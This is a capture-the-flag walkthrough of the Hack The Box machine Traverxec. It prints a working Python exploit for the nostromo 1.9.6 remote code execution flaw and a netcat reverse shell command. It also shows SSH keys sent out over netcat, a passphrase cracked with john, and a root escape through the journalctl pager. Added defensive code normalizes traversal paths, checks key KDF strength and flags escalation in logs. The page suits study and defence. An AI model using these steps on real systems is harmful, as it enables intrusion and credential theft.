Hack-The-Box-walkthrough[Traverxec]

Introduction

OS: Linux
Difficulty: Easy
Points: 20
Released: 16 November 2019
IP: 10.10.10.165

User first blood: 2 hours 26 minutes 49 seconds.
Root first blood: 3 hours 06 minutes 28 seconds.

Information gathering

Start with nmap

C:\Users\HASEE>nmap -p- -v -sV 10.10.10.165 --min-rate=1000 -T4
PORT STATE SERVICE VERSION
22/tcp open tcpwrapped
80/tcp open tcpwrapped
C:\Users\HASEE>nmap -p 22,80 -v -A -T4 10.10.10.165
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
| ssh-hostkey:
| 2048 aa:99:a8:16:68:cd:41:cc:f9:6c:84:01:c7:59:09:5c (RSA)
|_ 256 93:dd:1a:23:ee:d7:1f:08:6b:58:47:09:73:a3:88:cc (ECDSA)
80/tcp open http nostromo 1.9.6
|_http-favicon: Unknown favicon MD5: FED84E16B6CCFE88EE7FFAAE5DFEFD34
|_http-server-header: nostromo 1.9.6
|_http-title: TRAVERXEC

The scan shows that ports 22 and 80 are open. Nmap reports the http-server-header as nostromo 1.9.6, which means the box is running the nostromo HTTP server.

Nostromo, or nhttpd, is an open-source web server.

The web page does not show anything interesting, and a Gobuster scan did not turn up anything useful either.

Manual exploitation

After some research: nostromo version 1.9.6 has a remote code execution vulnerability.

  • nostromo-1.9.6-Remote-Code-Execution

Now download the Python exploit script and run it as follows.

First, look at the contents of the exploit.

# Exploit Title: nostromo 1.9.6 - Remote Code Execution
# Date: 2019-12-31
# Exploit Author: Kr0ff
# Vendor Homepage:
# Software Link: http://www.nazgul.ch/dev/nostromo-1.9.6.tar.gz
# Version: 1.9.6
# Tested on: Debian
# CVE : CVE-2019-16278

# cve2019_16278.py

#!/usr/bin/env python

import sys
import socket

art = """

_____-2019-16278
_____ _______ ______ _____\ \
_____\ \_\ | | | / / | |
/ /| || / / /|/ / /___/|
/ / /____/||\ \ \ |/| |__ |___|/
| | |____|/ \ \ \ | | | \
| | _____ \| \| | | __/ __
|\ \|\ \ |\ /| |\ \ / \
| \_____\| | | \_______/ | | \____\/ |
| | /____/| \ | | / | | |____/|
\|_____| || \|_____|/ \|____| | |
|____|/ |___|/



"""

help_menu = '\r\nUsage: cve2019-16278.py <Target_IP> <Target_Port> <Command>'

def connect(soc):
    # Read the HTTP response until the server closes the connection.
    response = ""
    try:
        while True:
            connection = soc.recv(1024)
            if len(connection) == 0:
                break
            # decode() keeps this working on both Python 2 and Python 3
            response += connection.decode("utf-8", "replace")
    except Exception:
        pass
    return response

def cve(target, port, cmd):
    soc = socket.socket()
    soc.connect((target, int(port)))
    # The request path carries a CR (%0d) inside each ".." segment; the body is the command to run.
    payload = 'POST /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.0\r\nContent-Length: 1\r\n\r\necho\necho\n{} 2>&1'.format(cmd)
    soc.send(payload.encode())
    receive = connect(soc)
    print(receive)

if __name__ == "__main__":

    print(art)

    try:
        target = sys.argv[1]
        port = sys.argv[2]
        cmd = sys.argv[3]

        cve(target, port, cmd)

    except IndexError:
        print(help_menu)

Then use the script to execute commands.

C:\Users\HASEE\Desktop\hack the box靶机渗透\Traverxec>python exploit.py 10.10.10.165 80 id


_____-2019-16278
_____ _______ ______ _____\ \
_____\ \_\ | | | / / | |
/ /| || / / /|/ / /___/|
/ / /____/||\ \ \ |/| |__ |___|/
| | |____|/ \ \ \ | | | \
| | _____ \| \| | | __/ __
|\ \|\ \ |\ /| |\ \ / \
| \_____\| | | \_______/ | | \____\/ |
| | /____/| \ | | / | | |____/|
\|_____| || \|_____|/ \|____| | |
|____|/ |___|/




HTTP/1.1 200 OK
Date: Wed, 22 Apr 2020 02:12:04 GMT
Server: nostromo 1.9.6
Connection: close


uid=33(www-data) gid=33(www-data) groups=33(www-data)

To get a reverse shell, Netcat can be used. Start a Netcat listener on the local machine and run the script.

root@kali:~/vulnhub/Traverxec# python exploit.py 10.10.10.165 80 "nc -c /bin/sh 10.10.15.136 5566"


_____-2019-16278
_____ _______ ______ _____\ \
_____\ \_\ | | | / / | |
/ /| || / / /|/ / /___/|
/ / /____/||\ \ \ |/| |__ |___|/
| | |____|/ \ \ \ | | | \
| | _____ \| \| | | __/ __
|\ \|\ \ |\ /| |\ \ / \
| \_____\| | | \_______/ | | \____\/ |
| | /____/| \ | | / | | |____/|
\|_____| || \|_____|/ \|____| | |
|____|/ |___|/

The reverse shell was received successfully.

root@kali:~# nc -lvp 5566
listening on [any] 5566 ...
10.10.10.165: inverse host lookup failed: Unknown host
connect to [10.10.15.136] from (UNKNOWN) [10.10.10.165] 47074
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
whoami
www-data
python -c 'import pty; pty.spawn("/bin/bash")'
www-data@traverxec:/usr/bin$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@traverxec:/usr/bin$ whoami
whoami
www-data

Metasploit can also be used

A Metasploit module can also be used to exploit this vulnerability. Start Metasploit and try exploiting it.

msfconsole
msf > use exploit/multi/http/nostromo_code_exec
msf > set rhosts 10.10.10.165
msf > set lhost 10.10.15.136
msf > run
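
A defender's view of the traversal used above, as an added example (not code from this page, from the exploit author, or from nostromo): the request path only gets through because a percent-encoded CR (%0d) sits inside each ".." segment. The function below decodes the path exactly once, rejects any control byte, resolves the dot segments and refuses anything that would leave the docroot. The request lines are constructed samples; the first mirrors the path shape the exploit script sends. `naive_check` is a deliberately insufficient comparison included to show what such encodings get past.

```python
import re
from urllib.parse import unquote_to_bytes

# Constructed sample request lines (not taken from any log on this page).
# The first one has the same path shape as the POST the exploit script sends.
SAMPLE_REQUESTS = [
    "POST /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.0",
    "GET /index.html HTTP/1.1",
    "GET /icons/../../../etc/passwd HTTP/1.1",
    "GET /%2e%2e/%2e%2e/etc/passwd HTTP/1.1",
    "GET /~david/public_www/index.html HTTP/1.1",
    "GET /a/./b/../c.html HTTP/1.1",
]

REQUEST_LINE = re.compile(r"^([A-Z]+)\s+(\S+)\s+HTTP/\d\.\d$")


def naive_check(raw_path):
    """The kind of check that is NOT enough: a literal '..' search on the
    raw, still percent-encoded path. Returns True when it would let the
    request through."""
    return ".." not in raw_path


def safe_resolve(raw_path):
    """Decode exactly once, refuse control characters, then resolve the
    '.' and '..' segments. Returns the normalized docroot-relative path,
    or None when the request must be rejected."""
    decoded = unquote_to_bytes(raw_path.split("?", 1)[0])
    # CR, LF, NUL and other control bytes never belong in a file path.
    if any(b < 0x20 or b == 0x7F for b in decoded):
        return None
    parts = []
    for segment in decoded.decode("latin-1").split("/"):
        if segment in ("", "."):
            continue
        if segment == "..":
            if not parts:
                return None  # would climb above the docroot
            parts.pop()
        else:
            parts.append(segment)
    return "/" + "/".join(parts)


def triage(lines):
    """Classify each request line. Each result is
    (raw_path, verdict, resolved_path, naive_check_passed)."""
    results = []
    for line in lines:
        match = REQUEST_LINE.match(line)
        if not match:
            results.append((line, "malformed", None, False))
            continue
        _method, raw = match.groups()
        resolved = safe_resolve(raw)
        verdict = "ok" if resolved is not None else "reject"
        results.append((raw, verdict, resolved, naive_check(raw)))
    return results


if __name__ == "__main__":
    for raw, verdict, resolved, naive_ok in triage(SAMPLE_REQUESTS):
        flag = "pass" if naive_ok else "block"
        print(f"{verdict:7} naive_check={flag}  {raw} -> {resolved}")
```

Running it shows both the CR-stuffed path and the `%2e%2e` path sailing through `naive_check` while `safe_resolve` rejects them; the same decode-once-then-normalize order is what a server (or a WAF in front of it) has to follow before it looks at the filesystem.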

Lateral movement

Enumerate the system to look for privilege escalation vectors. The /etc/passwd file shows a user named david.

It also shows that the Nostromo web root is /var/nostromo/.

The folder /var/nostromo/conf contains the web server configuration files.

The files nhttpd.conf and .htpasswd look interesting.

.htpasswd contains a password hash; the hash is crackable, but it is of no use here.
The conf file contains the following configuration.

www-data@traverxec:/var/nostromo/conf$ ls
ls
mimes nhttpd.conf
www-data@traverxec:/var/nostromo/conf$ cat nhttpd.conf
cat nhttpd.conf
# MAIN [MANDATORY]

servername traverxec.htb
serverlisten *
serveradmin david@traverxec.htb
serverroot /var/nostromo
servermimes conf/mimes
docroot /var/nostromo/htdocs
docindex index.html

# LOGS [OPTIONAL]

logpid logs/nhttpd.pid

# SETUID [RECOMMENDED]

user www-data

# BASIC AUTHENTICATION [OPTIONAL]

htaccess .htaccess
htpasswd /var/nostromo/conf/.htpasswd

# ALIASES [OPTIONAL]

/icons /var/nostromo/icons

# HOMEDIRS [OPTIONAL]

homedirs /home
homedirs_public public_www

The HOMEDIRS section indicates that a user's home directory may contain a public_www folder.

The user's home directory is not readable, but public_www turns out to be accessible.

That folder contains a protected-file-area subfolder.

www-data@traverxec:/var/nostromo/conf$ cd /home/david/public_www/protected-file-area
<conf$ cd /home/david/public_www/protected-file-area
www-data@traverxec:/home/david/public_www/protected-file-area$ ls
ls
backup-ssh-identity-files.tgz

Enumerating the folder reveals some backed-up SSH keys. Transfer them to the local box with netcat. Run the following command locally to receive the file.

root@kali:~/vulnhub/Traverxec# nc -lvp 1234 > backup.tgz
listening on [any] 1234 ...

Next, run the following command on the server to complete the transfer.

www-data@traverxec:/home/david/public_www/protected-file-area$ nc 10.10.15.136 1234 < backup-ssh-identity-files.tgz
<c 10.10.15.136 1234 < backup-ssh-identity-files.tgz

The file was received successfully on the Kali side.

root@kali:~/vulnhub/Traverxec# ls -la
总用量 16
drwxr-xr-x 2 root root 4096 4月 21 22:58 .
drwxrwxrwx 21 root root 4096 4月 21 22:32 ..
-rw-r--r-- 1 root root 1915 4月 21 23:01 backup.tgz
-rw-r--r-- 1 root root 1503 4月 21 22:33 exploit.py

Extract the files from backup.tgz.

root@kali:~/vulnhub/Traverxec# tar -xvf backup.tgz 
home/david/.ssh/
home/david/.ssh/authorized_keys
home/david/.ssh/id_rsa
home/david/.ssh/id_rsa.pub
root@kali:~/vulnhub/Traverxec# ls
backup.tgz exploit.py home

The archive turns out to contain SSH keys, and the private key id_rsa can be used to log in as the david user.

root@kali:~/vulnhub/Traverxec/home/david/.ssh# ssh -i id_rsa david@10.10.10.165
The authenticity of host '10.10.10.165 (10.10.10.165)' can't be established.
ECDSA key fingerprint is SHA256:CiO/pUMzd+6bHnEhA2rAU30QQiNdWOtkEPtJoXnWzVo.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.165' (ECDSA) to the list of known hosts.
Enter passphrase for key 'id_rsa':

However, the private key is encrypted and requires a passphrase. Try to crack it with john. First, use ssh2john to extract the hash from the RSA key.

root@kali:~/vulnhub/Traverxec/home/david/.ssh# python3 /usr/share/john/ssh2john.py id_rsa > hash.txt
/usr/share/john/ssh2john.py:103: DeprecationWarning: decodestring() is a deprecated alias since Python 3.1, use decodebytes()
data = base64.decodestring(data)
root@kali:~/vulnhub/Traverxec/home/david/.ssh# ls
authorized_keys hash.txt id_rsa id_rsa.pub
root@kali:~/vulnhub/Traverxec/home/david/.ssh# cat hash.txt
id_rsa:$sshng$1$16$477EEFFBA56F9D283D349033D5D08C4F$1200$...

Next, crack it with john and the rockyou.txt wordlist.

root@kali:~/vulnhub/Traverxec/home/david/.ssh# john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 4 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
hunter (id_rsa)
Warning: Only 2 candidates left, minimum 4 needed for performance.
1g 0:00:00:09 DONE (2020-04-21 23:13) 0.1097g/s 1574Kp/s 1574Kc/s 1574KC/sa6_123..*7¡Vamos!
Session completed
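
Two lines of the john output above explain why the crack finished in nine seconds at over 1.5 million candidates per second: "Cost 1 (KDF/cipher ...) is 0" (MD5/AES) and "Cost 2 (iteration count) is 1". The key was saved in the legacy PEM layout, where the passphrase is stretched by a single MD5 pass, rather than in the current openssh-key-v1 container with its bcrypt KDF (16 rounds by default, more with `ssh-keygen -a`). The following is an added example, not code from this page or from OpenSSH, that tells the two formats apart and reports the KDF strength without touching any key material. Both sample keys are constructed with filler bodies; the remediation it points at is `ssh-keygen -p -o -a 100 -f id_rsa`, which re-encrypts an existing key in the new format.

```python
import base64
import struct

OPENSSH_BEGIN = "-----BEGIN OPENSSH PRIVATE KEY-----"
LEGACY_BEGINS = {
    "-----BEGIN RSA PRIVATE KEY-----",
    "-----BEGIN DSA PRIVATE KEY-----",
    "-----BEGIN EC PRIVATE KEY-----",
}
AUTH_MAGIC = b"openssh-key-v1\x00"
DEFAULT_BCRYPT_ROUNDS = 16  # what ssh-keygen uses when -a is not given


def _ssh_string(data):
    """Length-prefixed string as used in the OpenSSH wire and file formats."""
    return struct.pack(">I", len(data)) + data


def _read_string(buf, pos):
    (length,) = struct.unpack(">I", buf[pos:pos + 4])
    return buf[pos + 4:pos + 4 + length], pos + 4 + length


def _verdict(info):
    if info["format"] == "unknown":
        return "unknown"
    if not info["encrypted"]:
        return "unencrypted"
    if info["format"] == "legacy-pem":
        return "weak-kdf"
    if info["rounds"] is not None and info["rounds"] < DEFAULT_BCRYPT_ROUNDS:
        return "low-rounds"
    return "ok"


def inspect_key(pem_text):
    """Report how a private key file protects its passphrase."""
    lines = [line.strip() for line in pem_text.strip().splitlines()]
    info = {"format": "unknown", "encrypted": False, "cipher": None,
            "kdf": None, "rounds": None}
    if lines[0] in LEGACY_BEGINS:
        info["format"] = "legacy-pem"
        headers = {}
        for line in lines[1:]:
            if not line or ":" not in line:
                break
            name, value = line.split(":", 1)
            headers[name.strip()] = value.strip()
        if "ENCRYPTED" in headers.get("Proc-Type", ""):
            info["encrypted"] = True
            info["cipher"] = headers.get("DEK-Info", "").split(",")[0]
            # OpenSSL PEM encryption derives the key with EVP_BytesToKey:
            # one MD5 pass over passphrase+salt, which is what john reported.
            info["kdf"] = "md5-single-pass"
            info["rounds"] = 1
    elif lines[0] == OPENSSH_BEGIN:
        blob = base64.b64decode("".join(lines[1:-1]))
        if blob.startswith(AUTH_MAGIC):
            info["format"] = "openssh-v1"
            pos = len(AUTH_MAGIC)
            cipher, pos = _read_string(blob, pos)
            kdf, pos = _read_string(blob, pos)
            kdfopts, pos = _read_string(blob, pos)
            info["cipher"] = cipher.decode()
            info["kdf"] = kdf.decode()
            info["encrypted"] = info["cipher"] != "none"
            if info["kdf"] == "bcrypt":
                _salt, p = _read_string(kdfopts, 0)  # kdfoptions = string salt, uint32 rounds
                (info["rounds"],) = struct.unpack(">I", kdfopts[p:p + 4])
    info["verdict"] = _verdict(info)
    return info


# Constructed sample in the legacy PEM layout; the body is filler, not a key.
LEGACY_SAMPLE = """-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,00112233445566778899AABBCCDDEEFF

QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
-----END RSA PRIVATE KEY-----
"""


def build_openssh_sample(cipher=b"aes256-ctr", kdf=b"bcrypt", rounds=16):
    """Constructed openssh-key-v1 container with filler key blobs, so the
    parser has a realistic header to read."""
    kdfopts = _ssh_string(b"\x00" * 16) + struct.pack(">I", rounds) if kdf == b"bcrypt" else b""
    blob = (AUTH_MAGIC + _ssh_string(cipher) + _ssh_string(kdf) + _ssh_string(kdfopts)
            + struct.pack(">I", 1) + _ssh_string(b"filler-public-key")
            + _ssh_string(b"filler-private-section"))
    b64 = base64.b64encode(blob).decode()
    body = "\n".join(b64[i:i + 70] for i in range(0, len(b64), 70))
    return f"{OPENSSH_BEGIN}\n{body}\n-----END OPENSSH PRIVATE KEY-----\n"


if __name__ == "__main__":
    for name, key in (("legacy", LEGACY_SAMPLE), ("openssh", build_openssh_sample())):
        print(name, inspect_key(key))
```

Pointed at a real key directory, a "weak-kdf" or "unencrypted" verdict is the finding to act on: a backup archive of such keys, like the one found in protected-file-area here, is only as strong as a dictionary run against rockyou.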

It shows hunter as the passphrase; use it to SSH into the box.

root@kali:~/vulnhub/Traverxec/home/david/.ssh# ssh -i id_rsa david@10.10.10.165
Enter passphrase for key 'id_rsa':
Linux traverxec 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u1 (2019-09-20) x86_64
Last login: Tue Apr 21 19:57:32 2020 from 10.10.15.14
david@traverxec:~$ id
uid=1000(david) gid=1000(david) groups=1000(david),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
david@traverxec:~$ whoami
david
david@traverxec:~$ ls
bin public_www user.txt
david@traverxec:~$ cat user.txt
7db0b48469606a42cec20750d9782f3d

Logged in successfully and found user.txt, then submitted it.

Privilege escalation

The user's home directory contains a folder named bin with the following contents.

david@traverxec:~$ cd bin
david@traverxec:~/bin$ ls
server-stats.head server-stats.sh
david@traverxec:~/bin$ cat server-stats.head
.----.
.---------. | == |
Webserver Statistics and Data |.-"""""-.| |----|
Collection Script || || | == |
(c) David, 2019 || || |----|
|'-.....-'| |::::|
'"")---(""' |___.|
/:::::::::::\" "
/:::=======:::\
jgs '"""""""""""""'

david@traverxec:~/bin$ cat server-stats.sh
#!/bin/bash

cat /home/david/bin/server-stats.head
echo "Load: `/usr/bin/uptime`"
echo " "
echo "Open nhttpd sockets: `/usr/bin/ss -H sport = 80 | /usr/bin/wc -l`"
echo "Files in the docroot: `/usr/bin/find /var/nostromo/htdocs/ | /usr/bin/wc -l`"
echo " "
echo "Last 5 journal log lines:"
/usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service | /usr/bin/cat

The last line is interesting because it runs journalctl with sudo. Run the script to see the output.

david@traverxec:~/bin$ ./server-stats.sh 
.----.
.---------. | == |
Webserver Statistics and Data |.-"""""-.| |----|
Collection Script || || | == |
(c) David, 2019 || || |----|
|'-.....-'| |::::|
'"")---(""' |___.|
/:::::::::::\" "
/:::=======:::\
jgs '"""""""""""""'

Load: 23:31:53 up 18:20, 1 user, load average: 0.00, 0.00, 0.00

Open nhttpd sockets: 4
Files in the docroot: 117

Last 5 journal log lines:
-- Logs begin at Tue 2020-04-21 05:11:04 EDT, end at Tue 2020-04-21 23:31:53 EDT. --
Apr 21 18:32:26 traverxec crontab[10493]: (www-data) LIST (www-data)
Apr 21 18:32:26 traverxec sudo[10666]: pam_unix(sudo:auth): authentication failure; logname= uid=33 euid=0 tty=/dev/pts/7 ruser=www-data rhost= user=www-data
Apr 21 18:32:28 traverxec sudo[10666]: pam_unix(sudo:auth): conversation failed
Apr 21 18:32:28 traverxec sudo[10666]: pam_unix(sudo:auth): auth could not identify password for [www-data]
Apr 21 18:32:28 traverxec sudo[10666]: www-data : command not allowed ; TTY=pts/7 ; PWD=/usr/bin ; USER=root ; COMMAND=list

The script uses journalctl to return the last 5 lines of the nostromo service log.

This can be exploited because journalctl hands its output to the default pager, which is most likely less.

less displays the output on the user's screen and then waits for user input.

That waiting prompt is the opening: it can be used to run shell commands.

/usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service

The command above drops into less, where a shell command can be run by prefixing it with !. Try executing /bin/bash.

!/bin/bash

Successfully escalated to root and obtained root.txt.

david@traverxec:~/bin$ /usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service
-- Logs begin at Wed 2020-04-22 00:21:56 EDT, end at Wed 2020-04-22 02:03:27 EDT. --
Apr 22 01:16:05 traverxec sudo[794]: www-data : user NOT in sudoers ; TTY=pts/1 ; PWD=/etc ; USER=root ; COMMAND=/bin/bash
Apr 22 01:58:13 traverxec su[856]: pam_unix(su:auth): authentication failure; logname= uid=33 euid=0 tty= ruser=www-data rh
Apr 22 01:58:15 traverxec su[856]: FAILED SU (to root) www-data on none
Apr 22 01:58:28 traverxec su[860]: pam_unix(su:auth): authentication failure; logname= uid=33 euid=0 tty= ruser=www-data rh
Apr 22 01:58:31 traverxec su[860]: FAILED SU (to root) www-data on none
!/bin/bash
root@traverxec:/home/david/bin# id
uid=0(root) gid=0(root) groups=0(root)
root@traverxec:/home/david/bin# whoami
root
root@traverxec:/home/david/bin# cd /root
root@traverxec:~# ls
nostromo_1.9.6-1.deb root.txt
root@traverxec:~# cat root.txt
9aa36a6d76f785dfd320a478f6e0d906
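
The journal lines the script printed along the way are worth a second look from the blue-team side: a web-server account such as www-data failing sudo and su is a strong post-exploitation signal, and a sudo-permitted journalctl without `--no-pager` is exactly what the escalation above rides on. The following is an added example (not code from this page or from any tool named on it) that runs those checks over sample journal lines. The www-data lines are copied from this page's journalctl output; the david and sshd lines are constructed so that there is a permitted sudo command to examine. The fix on the script side is to call `journalctl --no-pager` (and to pin the sudoers entry to that exact command line), which keeps the statistics output intact without ever handing david an interactive pager running as root.

```python
import re
from collections import Counter

# Sample journal lines. The www-data lines are the ones shown on this page;
# the david and sshd lines are constructed for the example.
SAMPLE_LOG = """\
Apr 21 18:32:26 traverxec crontab[10493]: (www-data) LIST (www-data)
Apr 21 18:32:26 traverxec sudo[10666]: pam_unix(sudo:auth): authentication failure; logname= uid=33 euid=0 tty=/dev/pts/7 ruser=www-data rhost= user=www-data
Apr 21 18:32:28 traverxec sudo[10666]: pam_unix(sudo:auth): conversation failed
Apr 21 18:32:28 traverxec sudo[10666]: pam_unix(sudo:auth): auth could not identify password for [www-data]
Apr 21 18:32:28 traverxec sudo[10666]: www-data : command not allowed ; TTY=pts/7 ; PWD=/usr/bin ; USER=root ; COMMAND=list
Apr 22 01:16:05 traverxec sudo[794]: www-data : user NOT in sudoers ; TTY=pts/1 ; PWD=/etc ; USER=root ; COMMAND=/bin/bash
Apr 22 01:58:15 traverxec su[856]: FAILED SU (to root) www-data on none
Apr 22 02:10:00 traverxec sudo[900]: david : TTY=pts/0 ; PWD=/home/david/bin ; USER=root ; COMMAND=/usr/bin/journalctl -n5 -unostromo.service
Apr 22 02:11:00 traverxec sudo[905]: david : TTY=pts/0 ; PWD=/home/david/bin ; USER=root ; COMMAND=/usr/bin/journalctl --no-pager -n5 -unostromo.service
Apr 22 02:12:00 traverxec sshd[910]: Accepted publickey for david from 10.10.15.136 port 50000 ssh2
"""

SUDO_DENIED = re.compile(
    r" sudo\[\d+\]: (?P<user>\S+) : (?P<reason>user NOT in sudoers|command not allowed) ; "
    r".*USER=(?P<target>\S+) ; COMMAND=(?P<cmd>.+)$")
SUDO_ALLOWED = re.compile(
    r" sudo\[\d+\]: (?P<user>\S+) : TTY=.*USER=(?P<target>\S+) ; COMMAND=(?P<cmd>.+)$")
FAILED_SU = re.compile(r" su\[\d+\]: FAILED SU \(to (?P<target>\S+)\) (?P<user>\S+) on ")
PAM_AUTH_FAIL = re.compile(
    r" (?P<svc>sudo|su)\[\d+\]: pam_unix\(\w+:auth\): authentication failure; .*ruser=(?P<user>\S*) ")

# Accounts that have no business trying to become root on a web server.
SERVICE_ACCOUNTS = {"www-data"}
# Commands that hand the terminal to a pager unless told otherwise.
PAGER_COMMANDS = {"journalctl", "/usr/bin/journalctl"}


def analyze(log_text):
    """Walk journal lines and collect privilege-related findings."""
    findings = {
        "denied": [],                     # (user, reason, command)
        "failed_su": [],                  # (user, target)
        "pam_failures": Counter(),        # (service, user) -> count
        "pager_via_sudo": [],             # (user, command): allowed, but pager-capable
        "service_account_escalation": set(),
    }
    for line in log_text.splitlines():
        if m := SUDO_DENIED.search(line):
            findings["denied"].append((m["user"], m["reason"], m["cmd"]))
            if m["user"] in SERVICE_ACCOUNTS:
                findings["service_account_escalation"].add(m["user"])
        elif m := SUDO_ALLOWED.search(line):
            argv = m["cmd"].split()
            if argv and argv[0] in PAGER_COMMANDS and "--no-pager" not in argv:
                findings["pager_via_sudo"].append((m["user"], m["cmd"]))
        elif m := FAILED_SU.search(line):
            findings["failed_su"].append((m["user"], m["target"]))
            if m["user"] in SERVICE_ACCOUNTS:
                findings["service_account_escalation"].add(m["user"])
        elif m := PAM_AUTH_FAIL.search(line):
            findings["pam_failures"][(m["svc"], m["user"])] += 1
    return findings


if __name__ == "__main__":
    for key, value in analyze(SAMPLE_LOG).items():
        print(f"{key}: {value}")
```

On the sample, the two www-data sudo denials and the failed su land in `service_account_escalation`, and only the first of david's two journalctl invocations is reported under `pager_via_sudo`; the `--no-pager` variant passes. The same patterns apply unchanged to `journalctl -u sudo` or to /var/log/auth.log on a Debian host.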

Summary of key points:

  • nostromo version 1.9.6 remote code execution vulnerability
  • nc -c /bin/sh 10.10.15.136 4444 to get a reverse shell
  • The Metasploit exploit/multi/http/nostromo_code_exec module to get a reverse shell
  • nc 10.10.15.136 1234 < backup-ssh-identity-files.tgz to send a file, and nc -lvp 1234 > backup.tgz to receive it
  • ssh2john to extract the hash from the RSA key
  • john with the rockyou.txt wordlist to crack the extracted hash
  • /usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service drops into less, where a command prefixed with ! runs a shell; executing /bin/bash there escalates to root.

Game over

The end, to be continued…